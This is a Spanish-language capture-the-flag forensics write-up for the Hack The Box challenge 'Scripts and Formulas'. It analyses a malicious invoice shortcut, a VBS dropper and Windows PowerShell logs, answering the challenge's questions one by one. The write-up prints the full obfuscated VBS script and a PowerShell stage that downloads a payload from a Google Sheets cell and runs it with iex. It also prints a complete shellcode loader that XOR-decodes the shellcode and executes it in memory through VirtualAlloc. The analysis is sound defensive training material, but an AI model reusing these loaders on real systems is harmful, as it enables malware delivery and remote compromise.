Scripts and Formulas
10 minutos de lectura
Se nos proporcionan los siguientes archivos:
$ file *
Invoice_01.lnk: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Tue May 30 18:44:18 2023, mtime=Tue Jul 4 11:46:42 2023, atime=Tue May 30 18:44:18 2023, length=492032, window=hidenormalshowminimized
invoice.vbs: ASCII text, with very long lines (2360), with CRLF line terminators
logs.zip: Zip archive data, at least v2.0 to extract, compression method=store
El archivo logs.zip
contiene muchos ficheros EVTX de logs de Windows.
Tenemos una instancia remota en la que debemos responder algunas preguntas:
$ nc 209.97.140.29 31969
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Title | Description |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Scripts and Formulas | After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, |
| | the UNZ hired a local geologist to examine possible sites that were used in the past |
| | for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, |
| | he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. |
| | Being new to the job, the clerk wasn't aware of the past situation and opened the Invoice. |
| | Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! |
| | Given some Logs from the Clerk's Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access! |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
Pregunta 1
What program is being copied, renamed, and what is the final name? (Eg: notepad.exe:picture.jpeg)
Se nos pide el nombre de un archivo que se copie y se renombre. Para esto, podemos echar un vistazo a los logs de PowerShell usando evtx_dump.py
(de python-evtx
) y grep
:
$ evtx_dump.py Windows/System32/Winevt/Logs/Windows\ PowerShell.evtx | grep HostApplication | sort -u
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -sta -noni -w hidden -c cp C:\Windows\System32\cscript.exe .\calc.exe;.\calc.exe Invoice.vbs
HostApplication=C:\windows\system32\windowspowershell\v1.0\powershell.exe -ep bypass -w hidden -c $url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));$resp = invoke-restmethod -uri $url;$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;$decode = [system.convert]::frombase64string($payload);$ms = new-object system.io.memorystream;$ms.write($decode,0, $decode.length);$ms.position =0;$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));$data = $sr.readtoend();$sr.close();$ms.close();$data|iex
Vemos que hay dos comandos de PowerShell, uno de ellos es:
cp C:\Windows\System32\cscript.exe .\calc.exe
Entonces, esta es la respuesta:
> cscript.exe:calc.exe
[+] Correct!
Pregunta 2
What is the name of the function that is used for deobfuscating the strings, in the VBS script? (Eg: funcName)
Aquí debemos leer el script VBS:
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM The great power of VBA programming in Office is that nearly every operation that you can perform with a mouse, keyboard, or a dialog box can also be automated by using VBA. Further, if it can be done once with VBA, it can be done just as easily a hundred times. In fact, the automation of repetitive tasks is one of the most common uses of VBA in Office.
Function ZbVxxAHCsiTnKpIJ()
Dim yNSlalZeGAsokjsP
Dim pJmLeYiULjageWIP
Dim cMtARTHTmbqbxauA
Dim bZzPBAGNtCswuUoo
Dim QlAtSUbRwRFNlEjX
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfowf("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & LLdunAaXwVgKfowf("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & LLdunAaXwVgKfowf("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" & LLdunAaXwVgKfowf("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & LLdunAaXwVgKfowf(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & LLdunAaXwVgKfowf("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & LLdunAaXwVgKfowf("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & LLdunAaXwVgKfowf("YP7aQTYtE3UaYLX[") & "0" & LLdunAaXwVgKfowf("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & LLdunAaXwVgKfowf("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & LLdunAaXwVgKfowf("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & LLdunAaXwVgKfowf("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & LLdunAaXwVgKfowf("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & LLdunAaXwVgKfowf("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
objShell.Run cMtARTHTmbqbxauA
End Function
REM Beyond the power of scripting VBA to accelerate every-day tasks, you can use VBA to add new functionality to Office applications or to prompt and interact with the user of your documents in ways that are specific to your business needs. For example, you could write some VBA code that displays a pop up message that reminds users to save a document to a particular network drive the first time they try to save it.
REM This code example shows how to take data from a worksheet and create a table of contents in an HTML file. The worksheet should have data in columns A, B, and C that correspond to the first, second, and third levels of the table of contents hierarchy. The HTML file is stored in the same working folder as the active workbook.
REM crucial for professionals across various industries. Microsoft Office, the go-to suite of productivity tools, offers a wealth of features and functionalities to enhance efficiency. However, many users are unaware of the hidden gem within Office: Visual Basic for Applications (VBA). This versatile programming language empowers users to automate tasks, customize applications, and unleash the full potential of Microsoft Office.
REM Excel, with its powerful data analysis capabilities, is a staple tool for professionals dealing with spreadsheets and calculations. VBA allows users to automate complex operations, manipulate data, and create custom functions to meet specific needs. By writing VBA code, users can streamline repetitive tasks like data entry, report generation, and data formatting. The ability to record and edit macros further simplifies the automation process, making it accessible to users without extensive programming knowledge.
REM Microsoft Word is widely used for creating documents, reports, and templates. With VBA, users can extend Word's functionality beyond its native features. VBA enables the creation of custom toolbars, buttons, and shortcuts to access frequently used commands. Users can also automate document creation by generating personalized letters, merging data from external sources, and performing advanced text manipulations. VBA provides a vast array of possibilities for automating workflows and enhancing document management.
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM Visual Basic for Applications (VBA) is a powerful tool that unlocks the true potential of Microsoft Office. By enabling automation, customization, and streamlining workflows, VBA empowers users to work more efficiently and effectively with Excel, Word, PowerPoint, Access, and Outlook. With its versatility and extensive capabilities, VBA provides professionals with a means to save time, reduce errors, and accomplish more in their day-to-day tasks. Embracing VBA can transform Microsoft Office into a tailored and automated productivity suite, revolutionizing the way we work.
REM VBA can transform PowerPoint into a dynamic presentation tool. Users can leverage VBA to automate the creation of slideshows, generate charts and graphs, and add interactive elements to engage the audience. By utilizing VBA, professionals can reduce the time spent on repetitive tasks such as formatting slides, applying consistent styles, and inserting multimedia content. With the ability to programmatically control every aspect of a presentation, VBA empowers users to deliver impactful and visually stunning presentations.
Function LLdunAaXwVgKfowf(t)
Dim msStr()
ReDim msStr(Len(t))
Dim jKaNZCemSwPDrmLT
jKaNZCemSwPDrmLT = ""
For i = 1 To UBound(msStr)
msStr(i) = Mid(t, i, 1)
Next
For Each qqEPRvFjIuMSmDvM In msStr
If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
Next
LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
End Function
REM VBA extends the capabilities of Microsoft Access and Outlook, allowing users to build powerful databases and automate email communication. In Access, VBA enables the creation of custom forms, reports, and queries, facilitating efficient data management. For Outlook, VBA offers the ability to automate email processing, organize messages into folders, and perform advanced filtering. By leveraging VBA, users can customize these applications to suit their specific needs, increasing productivity and efficiency.
Sub Main()
ZbVxxAHCsiTnKpIJ()
End Sub
Main()
Hay dos funciones: ZbVxxAHCsiTnKpIJ
(que ejecuta el payload) y LLdunAaXwVgKfowf
(que se usa para desofuscar el payload):
> LLdunAaXwVgKfowf
[+] Correct!
Pregunta 3
What program is used for executing the next stage? (Eg: notepad.exe)
Como se muestra anteriormente, hay un segundo comando usando PowerShell, que probablemente proviene de la ejecución del script VBS. Entonces, la respuesta es:
> powershell.exe
[+] Correct!
Pregunta 4
What is the Spreadsheet ID the malicious actor downloads the next stage from? (Eg: U3ByZWFkU2hlZXQgSUQK)
El payload de PowerShell se puede formatear como el siguiente código:
$url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));
$resp = invoke-restmethod -uri $url;
$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;
$decode = [system.convert]::frombase64string($payload);
$ms = new-object system.io.memorystream;
$ms.write($decode,0, $decode.length);
$ms.position =0;
$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));
$data = $sr.readtoend();
$sr.close();
$ms.close();
$data|iex
Hay una URL que viene de una cadena codificada en Base64:
$ echo aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU= | base64 -d
https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ?key=AIzaSyDUpjSf7R1l1dQohA5Qv9EdyWA3KBOMc0U&ranges=Sheet1!O37&includeGridData=true
Es una URL de la Google Spreadsheet. De aquí, sabemos que el ID de la hoja de cálculo es 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ
:
> 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ
[+] Correct!
Pregunta 5
What is the Sheet Name and Cell Number that houses the payload? (Eg: Sheet1:A1)
Esta información aparece en el parámetro range
de la URL:
> Sheet1:O37
[+] Correct!
Pregunta 6
What is the Event ID that relates to PowerShell execution? (Eg: 5991)
Una búsqueda rápida en Internet nos dirá la respuesta a esta pregunta:
> 4104
[+] Correct!
Pregunta 7
In the final payload, what is the XOR Key used to decrypt the shellcode? (Eg: 1337)
Para esto, podemos echar un vistazo a más logs de PowerShell:
$ evtx_dump.py Windows/System32/Winevt/Logs/Microsoft-Windows-PowerShell%4Operational.evtx | tail -56
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-07-05 10:57:24.761370"></TimeCreated>
<EventRecordID>79</EventRecordID>
<Correlation ActivityID="{0da93c0a-af83-0004-ba44-a90d83afd901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5700" ThreadID="5240"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>UNZ-RESEARCH-WS01</Computer>
<Security UserID="S-1-5-21-2954173937-1834019889-2190886044-1002"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL7yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCEsplEjIyOoo6sjIyNrpuNXRGsi86hrO3NnqGMDaiLzwHVuEupr3OpiqBerayL1axLjYuLqLo9iIuIbw1bSbyBvBytmGvJW+3tnqGMHaiLzRWKoL2tnqGM/aiLzYqgnq2si82J7Ynt9enlie2J6YnlroM8DYnHcw3tienlrqDHKaNzc3H5qnVRQEXwQESMjYnVqqsVros+DIiMjaqrGap8hIzenbmnlF2J3aqrHb6rSYplvVAUk3PZvqslLIiIjI3pimQqjSCPc9kkpYn1zc24S6m4S42vc42uq4Wvc42uq4mKZySz8w9z2a6rkSTNie2+qwWuq2mKZuoZXQtz2puNXKWrc7VbGy7AjIyNroM8za6rBbhLqSSdie2uq2mKZIfrrfNz2oNsjXXZroOcDfarVSWNieksjMyMjYntrqtFrEupimXuHcMbc9muq4Gqq5G4S6mqq02uq+Wuq2mKZIfrrfNz2oNsjXgt7YnR6SyNjIyNie0kjeWKZKAwsE9z2dHpimVZNbkLc9mrc7cof3NzcayLgawrla6bVVpdi3MR7SSN6auTh05aBddz2')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
</Data>
<Data Name="ScriptBlockId">a161d800-a564-40a3-aad8-4f9e02e966f7</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
</Events>
Como se puede ver, esta es la próxima etapa de PowerShell:
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL7yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCEsplEjIyOoo6sjIyNrpuNXRGsi86hrO3NnqGMDaiLzwHVuEupr3OpiqBerayL1axLjYuLqLo9iIuIbw1bSbyBvBytmGvJW+3tnqGMHaiLzRWKoL2tnqGM/aiLzYqgnq2si82J7Ynt9enlie2J6YnlroM8DYnHcw3tienlrqDHKaNzc3H5qnVRQEXwQESMjYnVqqsVros+DIiMjaqrGap8hIzenbmnlF2J3aqrHb6rSYplvVAUk3PZvqslLIiIjI3pimQqjSCPc9kkpYn1zc24S6m4S42vc42uq4Wvc42uq4mKZySz8w9z2a6rkSTNie2+qwWuq2mKZuoZXQtz2puNXKWrc7VbGy7AjIyNroM8za6rBbhLqSSdie2uq2mKZIfrrfNz2oNsjXXZroOcDfarVSWNieksjMyMjYntrqtFrEupimXuHcMbc9muq4Gqq5G4S6mqq02uq+Wuq2mKZIfrrfNz2oNsjXgt7YnR6SyNjIyNie0kjeWKZKAwsE9z2dHpimVZNbkLc9mrc7cof3NzcayLgawrla6bVVpdi3MR7SSN6auTh05aBddz2')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
Hay un bucle for
donde se descifra el payload usando XOR y una clave de valor 35
:
> 35
[+] Correct!
Flag
En este punto, tenemos la flag:
[+] Here is the flag: HTB{GSH33ts_4nd_str4ng3_f0rmula3_1s_4_g00d_w4y_f0r_byp4ss1ng_f1r3w4lls!!}